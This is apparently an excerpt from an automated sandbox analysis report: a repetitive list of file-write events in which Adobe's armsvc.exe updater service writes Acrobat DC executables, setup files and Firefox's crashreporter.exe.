Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
